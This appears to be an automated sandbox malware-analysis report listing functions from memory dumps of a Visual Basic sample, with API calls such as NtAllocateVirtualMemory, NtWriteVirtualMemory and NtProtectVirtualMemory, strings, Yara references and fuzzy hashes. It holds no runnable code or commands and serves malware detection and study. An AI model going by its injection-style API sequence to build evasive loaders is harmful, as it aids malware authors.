Uniqueness

Uniqueness Score: -1.00%

Function 0230E165, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 258COMMON

Download Yara Rule

Strings

tCL, xrefs: 0230E6EE
tCL, xrefs: 0230E6F3

Memory Dump Source

Source File: 00000002.00000002.313750716611.0000000002300000.00000040.00000001.sdmp, Offset: 02300000, based on PE: false

Yara matches

Similarity

API ID:
String ID: tCL$tCL
API String ID: 0-1225920340
Opcode ID: 31634e753f527abef794420a5a398421404a469cdbf9b741a83ec9cc790c1abe
Instruction ID: 1ec9dad28f1b3d025d8b135e8bd1621074837a666f36edfb999ddfb574ed563b
Opcode Fuzzy Hash: 31634e753f527abef794420a5a398421404a469cdbf9b741a83ec9cc790c1abe
Instruction Fuzzy Hash: 4FA13931704345CFDB399E78C9F47EA37A6AF96310F44492ACC8A8B6D2D3308545CB66

Uniqueness

Uniqueness Score: -1.00%

Function 0040415B, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 122COMMON

Download Yara Rule

Strings

EIJ2, xrefs: 0040416D
</Y, xrefs: 00404074

Memory Dump Source

Source File: 00000002.00000002.313748813863.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.313748778109.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.313748982678.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.313749031092.0000000000419000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: </Y$EIJ2
API String ID: 0-1381674127
Opcode ID: 63fc1223908d28ff51972a8561d08ca45a3dde88ac0ba9f5e84cd8dac2e41815
Instruction ID: 4fdcd5157eb28bd92e17da4bbb9c0a987152b77e108edbeaf4ecd54b6f860e43
Opcode Fuzzy Hash: 63fc1223908d28ff51972a8561d08ca45a3dde88ac0ba9f5e84cd8dac2e41815
Instruction Fuzzy Hash: EE3127606593420AEF3415708AD132E26A6ABD7300F74E87BC982EF9DBD63DC4C64347

Uniqueness

Uniqueness Score: -1.00%

Function 0230C119, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 163librarymemorynativeCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(B7106A3B), ref: 0230B765
NtAllocateVirtualMemory.NTDLL(3C652EF8,?,2273F526), ref: 0230C3B7

Strings

\A, xrefs: 0230C198

Memory Dump Source

Source File: 00000002.00000002.313750716611.0000000002300000.00000040.00000001.sdmp, Offset: 02300000, based on PE: false

Yara matches

Similarity

API ID: AllocateLibraryLoadMemoryVirtual
String ID: \A
API String ID: 2616484454-949662370
Opcode ID: 85046b7dd2dcbeae1cca44bbb8cdc6fdd470290ea3cbf64fdc6e9775741ad6d7
Instruction ID: ee84566a9a5780bf15f83ef08b0957c952950fd71d586ec122234225ac7b191a
Opcode Fuzzy Hash: 85046b7dd2dcbeae1cca44bbb8cdc6fdd470290ea3cbf64fdc6e9775741ad6d7
Instruction Fuzzy Hash: CD5157B2604245CBDF309E68CCE47EE77E6AF99360F55452ACC499B3A1D7308A428B61

Uniqueness

Uniqueness Score: -1.00%

Function 023018E5, Relevance: 3.3, Strings: 2, Instructions: 752COMMON

Download Yara Rule

Strings

]e , xrefs: 0230234B
"x, xrefs: 02301B08

Memory Dump Source

Source File: 00000002.00000002.313750716611.0000000002300000.00000040.00000001.sdmp, Offset: 02300000, based on PE: false

Yara matches

Similarity

API ID:
String ID: ]e $"x
API String ID: 0-1533451257
Opcode ID: a5447787615ff13030d948e6ac07291eec8146454b37702847ce42fb6052cf23
Instruction ID: 050c9f8812863b91b250603b60f025b4612fc1fcd853e1653783fd63268c3e33
Opcode Fuzzy Hash: a5447787615ff13030d948e6ac07291eec8146454b37702847ce42fb6052cf23
Instruction Fuzzy Hash: 85429C7260428A8FCB25CF74D8E9AD57BB1FF4A318F180599C8898F696D331D507CB61

Uniqueness

Uniqueness Score: -1.00%

Function 02304184, Relevance: 1.8, APIs: 1, Instructions: 284libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(B7106A3B), ref: 0230B765

Memory Dump Source

Source File: 00000002.00000002.313750716611.0000000002300000.00000040.00000001.sdmp, Offset: 02300000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: d3c776af1a79ddd377a3e4e842faa9bdb94acc880e53bca63104f6082de4cb03
Instruction ID: 5f4e10dc536ee7f4fea92ae2f662d0c3a908ee50459978dca85bff883e29ad68
Opcode Fuzzy Hash: d3c776af1a79ddd377a3e4e842faa9bdb94acc880e53bca63104f6082de4cb03
Instruction Fuzzy Hash: 87B10F32604388DFDB34DE28CC957DEBBA6AF49750F45441ADD89DB690D3309A81CF62

Uniqueness

Uniqueness Score: -1.00%

Function 02307B69, Relevance: 1.7, APIs: 1, Instructions: 205nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,?,?,00000000), ref: 02307B95

Memory Dump Source

Source File: 00000002.00000002.313750716611.0000000002300000.00000040.00000001.sdmp, Offset: 02300000, based on PE: false

Yara matches

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: ba508758039ff7b8985794c60a319d90c5f442fa68c2333f6fa500550efe4d12
Instruction ID: 640263a7147d01b140de4a9a7bf10670e32e33eae1c2deaa68ab52cd97fd3137
Opcode Fuzzy Hash: ba508758039ff7b8985794c60a319d90c5f442fa68c2333f6fa500550efe4d12
Instruction Fuzzy Hash: 24717BB3605288DFCF258F30CC95AD9BF71FF06314F08089AD9898B691D632A447CB64

Uniqueness

Uniqueness Score: -1.00%

Function 02303700, Relevance: 1.7, APIs: 1, Instructions: 175libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(B7106A3B), ref: 0230B765

Memory Dump Source

Source File: 00000002.00000002.313750716611.0000000002300000.00000040.00000001.sdmp, Offset: 02300000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 0f0a2f241047e0ec3ea5d942a8774fbef510030e7f72c4740fbdec9f32c19d95
Instruction ID: 18aa581b1a379d860abcd25e8c0f69c1211d7665248739056c4f306539a26f66
Opcode Fuzzy Hash: 0f0a2f241047e0ec3ea5d942a8774fbef510030e7f72c4740fbdec9f32c19d95
Instruction Fuzzy Hash: 32611EB2A04289DFDF709E68CC98BCE3BB6AF84350F95411ADC0C9B244D7309B45CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02307BAC, Relevance: 1.7, APIs: 1, Instructions: 157nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,?,?,00000000), ref: 02307B95

Memory Dump Source

Source File: 00000002.00000002.313750716611.0000000002300000.00000040.00000001.sdmp, Offset: 02300000, based on PE: false

Yara matches

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: 7b1435fd8c720db1e8276c8ea048f7ae3220e81690860e96d0144a1ab4750192
Instruction ID: 1c56c1fc38a54b45ad18fb5a2505e282c52776ebc0f080cef2a425cf0ba1c433
Opcode Fuzzy Hash: 7b1435fd8c720db1e8276c8ea048f7ae3220e81690860e96d0144a1ab4750192
Instruction Fuzzy Hash: 22516BB2605289DFCF258F30D8E5AD5BF71FF06314F18049AD4859F695C2326447CB65

Uniqueness

Uniqueness Score: -1.00%

Function 0230DC5F, Relevance: 1.5, APIs: 1, Instructions: 40nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(-4411A0B5,?,?,?,?,0230D05B), ref: 0230DD5A

Memory Dump Source

Source File: 00000002.00000002.313750716611.0000000002300000.00000040.00000001.sdmp, Offset: 02300000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 035f8cbb2208a2470388a451abd9dcf866d58770777658e683487a77667a7d2d
Instruction ID: f961494b5b3ef74d6a57bfb91d699eeb23aa1e26657931a0b1e39ecf548d754d
Opcode Fuzzy Hash: 035f8cbb2208a2470388a451abd9dcf866d58770777658e683487a77667a7d2d
Instruction Fuzzy Hash: 1F0144B16046459FDB34CE6CDD64AEA77A7AFD5301F448129DC0D4B748D7319D05C614

Uniqueness

Uniqueness Score: -1.00%

Function 02308A19, Relevance: 1.5, APIs: 1, Instructions: 16libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(732A71ED), ref: 02309C59

Memory Dump Source

Source File: 00000002.00000002.313750716611.0000000002300000.00000040.00000001.sdmp, Offset: 02300000, based on PE: false

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5e8385b299278c4ae30f4abaf2625eeb70b1b6990ed637d0ca0f32534a70cbe2
Instruction ID: 3e8884d35a32477600c82376c203e27d664c4f3a21139f7a358545b31266142c
Opcode Fuzzy Hash: 5e8385b299278c4ae30f4abaf2625eeb70b1b6990ed637d0ca0f32534a70cbe2
Instruction Fuzzy Hash: 29D05B70419256CBC319AE744CA5A15BF64AF23710301456E80D1474D3D715405CDFB1

Uniqueness

Uniqueness Score: -1.00%

Function 004145C4, Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__vbaVarDup.MSVBVM60 ref: 0041463E
#518.MSVBVM60(?,?), ref: 0041464B
__vbaVarTstNe.MSVBVM60(?,?,?,?), ref: 00414666
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?,?), ref: 00414678
#580.MSVBVM60(BRDMASKINERNES,00000001), ref: 0041468C
#534.MSVBVM60(BRDMASKINERNES,00000001), ref: 00414691
__vbaStrCopy.MSVBVM60 ref: 004146B3
__vbaFreeStr.MSVBVM60 ref: 004146DB
__vbaHresultCheckObj.MSVBVM60(00000000,00401110,004030F0,000002B4), ref: 00414721
#595.MSVBVM60(00000003,00000000,?,?,?), ref: 00414771
__vbaFreeVarList.MSVBVM60(00000004,00000003,?,?,?,00000003,00000000,?,?,?), ref: 00414788

Strings

BRDMASKINERNES, xrefs: 00414687
Java5, xrefs: 004146A5

Memory Dump Source

Source File: 00000002.00000002.313748813863.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.313748778109.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.313748982678.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.313749031092.0000000000419000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$List$#518#534#580#595CheckCopyHresult
String ID: BRDMASKINERNES$Java5
API String ID: 1094122113-3738844850
Opcode ID: 46ba9868485f77c3508854d956b4106acf3b20ab9fcd47e2e96cab5edbc387c7
Instruction ID: f8af2a707588264a37dda516b17c29d342dd02d676a00eed33b31a932f1a9f33
Opcode Fuzzy Hash: 46ba9868485f77c3508854d956b4106acf3b20ab9fcd47e2e96cab5edbc387c7
Instruction Fuzzy Hash: 2F51F6B1900228AFCB11DF94CC85EDEBBB8BF49304F1441AFE545B7291DB7856488B55

Uniqueness

Uniqueness Score: -1.00%

Function 004012F0, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 285COMMON

Download Yara Rule

APIs

#100.MSVBVM60(VB5!6&*), ref: 004012F5

Strings

VB5!6&*, xrefs: 004012F0

Memory Dump Source

Source File: 00000002.00000002.313748813863.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.313748778109.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.313748982678.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.313749031092.0000000000419000.00000002.00020000.sdmp Download File

Similarity

API ID: #100
String ID: VB5!6&*
API String ID: 1341478452-3593831657
Opcode ID: 4222714fd7c3f6b412446563863e0df81962509911b21dac2a8bfc1f81506585
Instruction ID: 6c86336c90af4b9bceaeba3a1c7f3800c4129304c87cbb85cd5bd432d9590e56
Opcode Fuzzy Hash: 4222714fd7c3f6b412446563863e0df81962509911b21dac2a8bfc1f81506585
Instruction Fuzzy Hash: 7D9133A548E3C15FD7138B748DA66A13FB0AE1331871E05EBC8C2DA5F3E12D595AC326

Uniqueness

Uniqueness Score: -1.00%

Function 02300C24, Relevance: 1.6, APIs: 1, Instructions: 126COMMON

Download Yara Rule

APIs

EnumWindows.USER32(?,?,00000000,55CB4D23), ref: 02300CB8

Memory Dump Source

Source File: 00000002.00000002.313750716611.0000000002300000.00000040.00000001.sdmp, Offset: 02300000, based on PE: false

Yara matches

Similarity

API ID: EnumWindows
String ID:
API String ID: 1129996299-0
Opcode ID: 6f7e9640ee95a9ecf4a12b97e75dbf747508885fd9efe2bf4f88cf81c94f599c
Instruction ID: 94bafaafc278439fc8a3f8954106030a2f0387a676a122f771a666692f239e35
Opcode Fuzzy Hash: 6f7e9640ee95a9ecf4a12b97e75dbf747508885fd9efe2bf4f88cf81c94f599c
Instruction Fuzzy Hash: 594187725083858BCB1A8B34D8E92C47FB4FF57328B2808CAC4D58F657D6729483CB61

Uniqueness

Uniqueness Score: -1.00%

Function 02303E3E, Relevance: 1.6, APIs: 1, Instructions: 109libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(B7106A3B), ref: 0230B765

Memory Dump Source

Source File: 00000002.00000002.313750716611.0000000002300000.00000040.00000001.sdmp, Offset: 02300000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 7d41f823f7a4c2ee53e079c3f87e42861135950192a7b670666d910375a61783
Instruction ID: 6c2d766de37a2a0a260bb3cbb264ad2b8c08e36222a78ed5e0a7a6f48a803250
Opcode Fuzzy Hash: 7d41f823f7a4c2ee53e079c3f87e42861135950192a7b670666d910375a61783
Instruction Fuzzy Hash: 3F411575504289DFDF70AE38C8E57DE77A6EF41760F54812ADC0A8B684DB7087018F66

Uniqueness

Uniqueness Score: -1.00%

Function 02300C0E, Relevance: 1.6, APIs: 1, Instructions: 109COMMON

Download Yara Rule

APIs

EnumWindows.USER32(?,?,00000000,55CB4D23), ref: 02300CB8

Memory Dump Source

Source File: 00000002.00000002.313750716611.0000000002300000.00000040.00000001.sdmp, Offset: 02300000, based on PE: false

Yara matches

Similarity

API ID: EnumWindows
String ID:
API String ID: 1129996299-0
Opcode ID: d798b3713adb2211f103d16ddf3f227996b746114b07f82c8f7992948c5b413f
Instruction ID: 1211e65fce0bbd6314d7912646274391e1675ae460768e413243f0066d85880c
Opcode Fuzzy Hash: d798b3713adb2211f103d16ddf3f227996b746114b07f82c8f7992948c5b413f
Instruction Fuzzy Hash: 623186725082808BD71ACF28C8E53D4BBB8FF57314F6908CAC9948EA03D2329547CB60

Uniqueness

Uniqueness Score: -1.00%

Function 02300C73, Relevance: 1.6, APIs: 1, Instructions: 99COMMON

Download Yara Rule

APIs

EnumWindows.USER32(?,?,00000000,55CB4D23), ref: 02300CB8

Memory Dump Source

Source File: 00000002.00000002.313750716611.0000000002300000.00000040.00000001.sdmp, Offset: 02300000, based on PE: false

Yara matches

Similarity

API ID: EnumWindows
String ID:
API String ID: 1129996299-0
Opcode ID: 2dea68f12e7050f67630e7ce9f4397e9fc9c45b1e2de89e921f4ef11e53ce3e7
Instruction ID: c130f5f72a148abd7971c079daad91784f18a38d66f96f7d2a3606fd25601dbc
Opcode Fuzzy Hash: 2dea68f12e7050f67630e7ce9f4397e9fc9c45b1e2de89e921f4ef11e53ce3e7
Instruction Fuzzy Hash: CB3166729082858FCB1A8F24D8E66C07BB4FF47225F6908CAC4818F50AD2229547CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0230B5F8, Relevance: 1.6, APIs: 1, Instructions: 59libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(B7106A3B), ref: 0230B765

Memory Dump Source

Source File: 00000002.00000002.313750716611.0000000002300000.00000040.00000001.sdmp, Offset: 02300000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: d4afba56ed860a916be1ae87ca84569c35202e22b1680c13a14a8b71da7a9e4f
Instruction ID: 6f2dcbf5d354c3d00cd19ff2303ca18b3dc9f9bf0951d9c5991f6c30cae79ae2
Opcode Fuzzy Hash: d4afba56ed860a916be1ae87ca84569c35202e22b1680c13a14a8b71da7a9e4f
Instruction Fuzzy Hash: 5821DE724442D8DBDF70EE24C8A5BCEBBB6EF90B60F44401ADC4D8B680C7309B418B66

Uniqueness

Uniqueness Score: -1.00%

Function 0230A48D, Relevance: 1.6, APIs: 1, Instructions: 57fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(?,-000000017A3FD5F8), ref: 0230A7A7

Memory Dump Source

Source File: 00000002.00000002.313750716611.0000000002300000.00000040.00000001.sdmp, Offset: 02300000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 14a5d6a29f6f787f9611b5e64b34cbd65d4ec90b3779e1b879ee2f4542295cae
Instruction ID: 02bee87fb3a2dfc12db820aceb590712ee8df9b1127dced6af68cbfb35c73458
Opcode Fuzzy Hash: 14a5d6a29f6f787f9611b5e64b34cbd65d4ec90b3779e1b879ee2f4542295cae
Instruction Fuzzy Hash: 3821C671508348DBD3289E31D9A46AFB7F6BF90640F12C91DCEC786A99E3304945CB27

Uniqueness

Uniqueness Score: -1.00%

Function 0230886C, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE ref: 02308861

Memory Dump Source

Source File: 00000002.00000002.313750716611.0000000002300000.00000040.00000001.sdmp, Offset: 02300000, based on PE: false

Yara matches

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: 080ceae16e54b3815de8f3d55ba4e544d211334232138e9293ec5f805153c35d
Instruction ID: 2e82c523eddea45dd01e7807cd19bf22503b4d0f1928201848975c2d88b98c09
Opcode Fuzzy Hash: 080ceae16e54b3815de8f3d55ba4e544d211334232138e9293ec5f805153c35d
Instruction Fuzzy Hash: 71F022B7A4160B5FCF65C764E8DFDC53BA07B0B32D7060884C04A8BAA8D6A1C5079761

Uniqueness

Uniqueness Score: -1.00%

Function 0230880A, Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE ref: 02308861

Memory Dump Source

Source File: 00000002.00000002.313750716611.0000000002300000.00000040.00000001.sdmp, Offset: 02300000, based on PE: false

Yara matches

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: 8ac8902bc7ea386138cad8681cee45097e27b7f401f5dba69e7259bee8e46634
Instruction ID: 7592e9b54af29500ae51d2c10be8ff6d5caad927087c6d53006055411df35ace
Opcode Fuzzy Hash: 8ac8902bc7ea386138cad8681cee45097e27b7f401f5dba69e7259bee8e46634
Instruction Fuzzy Hash: 6AF02733404089AFD328CA71CC5D6DE3B98EB89352F15859AE40D83D55DA349B468B80

Uniqueness

Uniqueness Score: -1.00%

Function 00404191, Relevance: 1.3, APIs: 1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.313748813863.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.313748778109.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.313748982678.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.313749031092.0000000000419000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07d0c4fd1165f47115750d9fe789a7c68dfafa52a956889c99f2d090ec788364
Instruction ID: 9e4beb959f78603f2525f38e8f82cb262021e4db3fcee7f6a445e0eb62b7f567
Opcode Fuzzy Hash: 07d0c4fd1165f47115750d9fe789a7c68dfafa52a956889c99f2d090ec788364
Instruction Fuzzy Hash: A31136702092418DEB785531C5D477D3BA2DB96300F3495BFC582CB8EAC93D84C25203

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 02303BBE, Relevance: 1.4, Strings: 1, Instructions: 139COMMON

Download Yara Rule

Strings

`, xrefs: 02303D85

Memory Dump Source

Source File: 00000002.00000002.313750716611.0000000002300000.00000040.00000001.sdmp, Offset: 02300000, based on PE: false

Yara matches

Similarity

API ID:
String ID: `
API String ID: 0-1850852036
Opcode ID: 5ad88c7f6e3b67407808a23e4cc20f2388fef3e13bff91bee69131c75a9762a7
Instruction ID: 3926ef77e545bbcd0a74b3c03bf9d6be5d1eb1ff45ad7df2c9677aa220d5954b
Opcode Fuzzy Hash: 5ad88c7f6e3b67407808a23e4cc20f2388fef3e13bff91bee69131c75a9762a7
Instruction Fuzzy Hash: 17416873A0060A8BEF34CF25ADE67D537A2BFDA329F554854CC4A9B29CD330C5478620

Uniqueness

Uniqueness Score: -1.00%

Function 02303BBC, Relevance: 1.3, Strings: 1, Instructions: 77COMMON

Download Yara Rule

Strings

`, xrefs: 02303D85

Memory Dump Source

Source File: 00000002.00000002.313750716611.0000000002300000.00000040.00000001.sdmp, Offset: 02300000, based on PE: false

Yara matches

Similarity

API ID:
String ID: `
API String ID: 0-1850852036
Opcode ID: af317e60efc737e09437c8cfba6f4cc53cf28c067bef5f1c83eed4ffc6288077
Instruction ID: dc3d61530b231d80761a168eb3edbb71a34c813a43b715ff8e4804dd6d3d4b0f
Opcode Fuzzy Hash: af317e60efc737e09437c8cfba6f4cc53cf28c067bef5f1c83eed4ffc6288077
Instruction Fuzzy Hash: 10318E729043498FEF34DE3ADE653DA37A3AFE4750F56405ACC0D9B145D3304686CA21

Uniqueness

Uniqueness Score: -1.00%

Function 02304195, Relevance: .2, Instructions: 230COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.313750716611.0000000002300000.00000040.00000001.sdmp, Offset: 02300000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf928037a7137e92f411bf1ae64e9ce0b28b7195388c158a2ff0cb16a50933ec
Instruction ID: b63de0866b4bec0b19cd583401d9ed6d449e9de811bf676c748251fee755e574
Opcode Fuzzy Hash: bf928037a7137e92f411bf1ae64e9ce0b28b7195388c158a2ff0cb16a50933ec
Instruction Fuzzy Hash: 46911D72604389DFCB34DE25CC95BEA7BA2BF49350F454419DE89DB294D3308A82CF22

Uniqueness

Uniqueness Score: -1.00%

Function 023042B5, Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.313750716611.0000000002300000.00000040.00000001.sdmp, Offset: 02300000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0330560b5561837cf430cedbea39911d26a0e4ba3b04a1297e1c110253daa378
Instruction ID: 7c9e465c4e3cab9f3fa5b208c557138f6aabcdcd5892a4c9fa0d0f46a7657087
Opcode Fuzzy Hash: 0330560b5561837cf430cedbea39911d26a0e4ba3b04a1297e1c110253daa378
Instruction Fuzzy Hash: DA81EE326083899FDB34DF24CC95BEA7BA1BF49310F45451DDE898B691D3309A86CF62

Uniqueness

Uniqueness Score: -1.00%

Function 023036D9, Relevance: .2, Instructions: 192COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.313750716611.0000000002300000.00000040.00000001.sdmp, Offset: 02300000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ffbcab402f2c085db5140cdd32e71ca2c16f92f234b827c750dcc62b09560e4b
Instruction ID: 14f32cbfe57441a9ae985ae06272a365f8996d1fe98238cc85acbfa9de3a5109
Opcode Fuzzy Hash: ffbcab402f2c085db5140cdd32e71ca2c16f92f234b827c750dcc62b09560e4b
Instruction Fuzzy Hash: 78616AB290438ADFCB308F64ECE9BDA3BB2BF49314F454155CD498B685D3319A46C761

Uniqueness

Uniqueness Score: -1.00%

Function 02304358, Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.313750716611.0000000002300000.00000040.00000001.sdmp, Offset: 02300000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f47a34356b5fa721ad07fb2aba0fe38b94058f52cfa6f207b00b05a7c70b1b6
Instruction ID: 9096f907763ca4c1bc35c13b6cde8537a9c4481701dd7b27e5966a85428e95b3
Opcode Fuzzy Hash: 7f47a34356b5fa721ad07fb2aba0fe38b94058f52cfa6f207b00b05a7c70b1b6
Instruction Fuzzy Hash: CD712431604389DFCB74DF24C895BDA7BE1BF4A320F454559CE898B694D3319A86CF22

Uniqueness

Uniqueness Score: -1.00%

Function 02304245, Relevance: .2, Instructions: 181libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(B7106A3B), ref: 0230B765

Memory Dump Source

Source File: 00000002.00000002.313750716611.0000000002300000.00000040.00000001.sdmp, Offset: 02300000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 9f4191cdc9af466bb2cd638db60723d05b7c2d128c54af93394251cdf818e328
Instruction ID: 472b08cce3143903dd7d3edeab9b494ddbdba6c9d8ac1120e98436a4fc880184
Opcode Fuzzy Hash: 9f4191cdc9af466bb2cd638db60723d05b7c2d128c54af93394251cdf818e328
Instruction Fuzzy Hash: 9571DB32604388DFDB349E29CC95BEA77A2BF49350F454529DE898B290D3309A81CF62

Uniqueness

Uniqueness Score: -1.00%

Function 02302F9B, Relevance: .2, Instructions: 153COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.313750716611.0000000002300000.00000040.00000001.sdmp, Offset: 02300000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0bf2465cb90502b995f5e01a41fd89f05bd278bd5eb73161a011614a44892194
Instruction ID: 0c395b3f6951213ed5305c184ab03f0aae0476c3e33f8c2007b6305326e987e1
Opcode Fuzzy Hash: 0bf2465cb90502b995f5e01a41fd89f05bd278bd5eb73161a011614a44892194
Instruction Fuzzy Hash: 7551F1B2A043458FDF689F28DC99BDA7BB2BF49340F15052DDC89DB254D3319A82CB21

Uniqueness

Uniqueness Score: -1.00%

Function 0230303C, Relevance: .2, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.313750716611.0000000002300000.00000040.00000001.sdmp, Offset: 02300000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64bc2f0f141cfe63769f09bc7f83475810a0c395dcee9332d6d084135b7f9741
Instruction ID: d971c90499cfbad0056e119f6ded3854079473d545f61fd6f6f8fc3ab0d44219
Opcode Fuzzy Hash: 64bc2f0f141cfe63769f09bc7f83475810a0c395dcee9332d6d084135b7f9741
Instruction Fuzzy Hash: 6A51D0B2B052458FDF789F24DC99ADA7BB2BF49300F054859DC899B264C37199838B21

Uniqueness

Uniqueness Score: -1.00%

Function 02302F90, Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.313750716611.0000000002300000.00000040.00000001.sdmp, Offset: 02300000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a18b9b1f9e16f6d25d5524d928864f7346e6bd71ea650fb0d3361f7d435d6f54
Instruction ID: 824859fe8ec175cd20fc5643d2f67c928e71e87c367f383e38f0e80587a77e9c
Opcode Fuzzy Hash: a18b9b1f9e16f6d25d5524d928864f7346e6bd71ea650fb0d3361f7d435d6f54
Instruction Fuzzy Hash: 6051BD726042849FDB689F28CD95BEE7BA6FF88340F15482DEC8CDB210C7315A82CB51

Uniqueness

Uniqueness Score: -1.00%

Function 02304484, Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.313750716611.0000000002300000.00000040.00000001.sdmp, Offset: 02300000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 703fc841169679cb13c06feeabf3eae4a71e8a3b12ebf64ac5265d694dea4e0f
Instruction ID: ca70afebe8c1e668b5ba4ac32d94aa9bab1ec35b8a042a59cd809c4e7715ab53
Opcode Fuzzy Hash: 703fc841169679cb13c06feeabf3eae4a71e8a3b12ebf64ac5265d694dea4e0f
Instruction Fuzzy Hash: E041CD32604389DFDB74DF2488D5BAA77A1BF09310F454919DE89CB695D7308A82CF22

Uniqueness

Uniqueness Score: -1.00%

Function 02304419, Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.313750716611.0000000002300000.00000040.00000001.sdmp, Offset: 02300000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 048eae98a83e353b2c7b132d056b6c98fdcb5681890ea672608cdcd6eeeca69c
Instruction ID: b3d1af06c12ae694d48a16a0dd30e55bb013ddeaff1d082332d370c9735d7483
Opcode Fuzzy Hash: 048eae98a83e353b2c7b132d056b6c98fdcb5681890ea672608cdcd6eeeca69c
Instruction Fuzzy Hash: B941BB31204388EFCB74DF25C8957EAB7A2BF49310F85492DDD898B294E7305A81CF22

Uniqueness

Uniqueness Score: -1.00%

Function 02305833, Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.313750716611.0000000002300000.00000040.00000001.sdmp, Offset: 02300000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da0bda13b1eb7662655fe62dd0f78e620b435a743a17290c7e0c5281e36730f4
Instruction ID: 06c0cf4d2682e311aad7a9507afde12a5db8e53ac9e24e81d28a4efa95ff50cb
Opcode Fuzzy Hash: da0bda13b1eb7662655fe62dd0f78e620b435a743a17290c7e0c5281e36730f4
Instruction Fuzzy Hash: 52316B72605B468BCB2A8B74C8D56657F60BF57330B584B9DC4A58F6EAC3309007CB61

Uniqueness

Uniqueness Score: -1.00%

